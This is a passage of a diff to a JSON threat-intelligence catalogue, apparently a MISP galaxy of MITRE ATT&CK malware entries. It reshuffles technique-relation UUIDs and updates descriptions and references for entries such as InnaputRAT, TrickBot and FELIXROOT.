"estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21674,6 +24284,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ @@ -21708,13 +24325,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c4b96c0b-cb58-497a-a1c2-bb447d79d692", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3c2e5de-0941-4b57-ba61-af029eb5517a", "tags": [ @@ -21730,7 +24340,7 @@ "type": "uses" }, { - "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21744,7 +24354,14 @@ "type": "uses" }, { - "dest-uuid": "99e6295e-741b-4857-b6e5-64989eb039b4", + "dest-uuid": "6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c4b96c0b-cb58-497a-a1c2-bb447d79d692", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21770,13 +24387,6 @@ ] }, "related": [ - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ 
@@ -21784,41 +24394,6 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -21826,6 +24401,13 @@ ], "type": "uses" }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ 
@@ -21833,19 +24415,54 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "c8b6cc43-ce61-42ae-87f3-a5f10526f952", "value": "InnaputRAT - S0259" }, { - "description": "[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in Australia. TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program that has mainly been used for targeting banking sites in United States, Canada, UK, Germany, Australia, Austria, Ireland, London, Switzerland, and Scotland. 
TrickBot first emerged in the wild in September 2016 and appears to be a successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) is developed in the C++ programming language. (Citation: S2 Grupo TrickBot June 2017) (Citation: Fidelis TrickBot Oct 2016) (Citation: IBM TrickBot Nov 2016)", "meta": { "external_id": "S0266", "mitre_platforms": [ @@ -21857,6 +24474,7 @@ "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/tspy_trickload.n", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Totbrick" ], "synonyms": [ @@ -21867,14 +24485,28 @@ }, "related": [ { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21895,28 +24527,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21930,21 +24541,14 @@ "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -21958,21 +24562,21 @@ "type": "uses" }, { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -21985,12 +24589,103 @@ ], "type": "uses" }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" 
+ }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "00806466-754d-44ea-ad6f-0caf59cb8556", @@ -22005,22 +24700,17 @@ ], "refs": [ "https://attack.mitre.org/software/S0267", - "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" + "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf" ], "synonyms": [ - "FELIXROOT" + "FELIXROOT", + "GreyEnergy mini" ] }, "related": [ { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22033,41 +24723,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ @@ -22076,7 +24731,14 @@ "type": "uses" }, { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22090,7 +24752,28 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22102,6 +24785,69 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "cf8df906-179c-4a78-bd6e-6605e30f6624", 
@@ -22126,35 +24872,7 @@ }, "related": [ { - "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e2907cea-4b43-4ed7-a570-0fdf0fbeea00", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22168,7 +24886,28 @@ "type": "uses" }, { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e2907cea-4b43-4ed7-a570-0fdf0fbeea00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22180,6 +24919,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7d751199-05fa-4a72-920f-85df4506c76c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4b072c90-bc7a-432b-940e-016fc1c01761", 
@@ -22236,14 +24982,7 @@ }, "related": [ { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22257,14 +24996,21 @@ "type": "uses" }, { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22285,21 +25031,21 @@ "type": "uses" }, { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22313,14 +25059,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22334,7 +25080,7 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22361,7 +25107,7 @@ }, "related": [ { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22375,56 +25121,7 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22438,7 +25135,42 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22452,14 +25184,28 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22486,14 +25232,7 @@ }, "related": [ { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22506,20 +25245,6 @@ ], "type": "uses" }, - { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ @@ -22527,12 +25252,33 @@ ], "type": "uses" }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "4a98e44a-bd52-461e-af1e-a4457de87a36", @@ -22561,6 +25307,13 @@ ], "type": "uses" }, + { + "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "d9db3d46-66ca-44b4-9daa-1ef97cb7465a", "tags": [ 
@@ -22574,13 +25327,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "6c49d50f-494d-4150-b774-a655022d20a6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "3c3b55a6-c3e9-4043-8aae-283fe96220c0", @@ -22618,14 +25364,7 @@ "type": "uses" }, { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22639,7 +25378,14 @@ "type": "uses" }, { - "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93", + "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22681,14 +25427,14 @@ "type": "uses" }, { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0d95940f-9583-4e0f-824c-a42c1be47fad", + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22715,7 +25461,7 @@ }, "related": [ { - "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -22729,21 +25475,7 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -22757,14 +25489,42 @@ "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": 